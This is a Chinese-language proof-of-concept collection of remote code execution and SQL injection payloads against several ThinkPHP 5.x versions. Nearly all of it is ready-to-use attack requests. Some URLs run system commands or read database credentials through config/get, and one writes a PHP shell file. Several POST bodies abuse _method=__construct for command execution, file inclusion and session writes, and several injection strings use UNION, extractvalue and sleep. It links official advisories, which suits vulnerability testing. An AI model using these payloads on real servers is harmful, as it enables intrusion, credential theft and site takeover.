thinkphp-RCE-POC

官方公告:
https://blog.thinkphp.cn/869075
https://blog.thinkphp.cn/910675

POC：

thinkphp 5.0.22

http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5

http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21

http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*

http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本

?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1' 
    header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27
index.php?s=/home/user/cut/id/1%27
index.php?s=/home/service/index/id/1%27
index.php?s=/home/pay/chongzhi/orderid/1%27
index.php?s=/home/pay/index/orderid/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/detail/id/1%27
index.php?s=/home/order/cancel/id/1%27
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
POST /index.php?s=/home/user/checkcode/ HTTP/1.1
    Content-Disposition: form-data; name="couponid"
    1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23（完整版）debug模式

(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)

（post）public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.10（完整版）

(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.1. 和 5.2. 和 5.0.*

(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.0.23 (Payload 优化版)

（post）public/index.php?s=captcha (data) 
_method=__construct&method=get&filter[]=call_user_func&server[]=-1&get[]=phpinfo&get[]=0

文件包含

（post）public/index.php?s=captcha (data) 
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=xxx/xxx.jpg

写 session（用于包含）

（post）public/index.php?s=captcha (data) 
_method=__construct&filter[]=think\Session::set&method=get&server[REQUEST_METHOD]=<?php phpinfo();?>

参考

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
https://www.skactor.tk/2019/08/24/Thinkphp%20Rce%E7%BB%95%E8%BF%87%E5%AE%9D%E5%A1%94%E9%9D%A2%E6%9D%BF%E7%9A%84%E5%A7%BF%E5%8A%BF%E5%88%86%E4%BA%AB/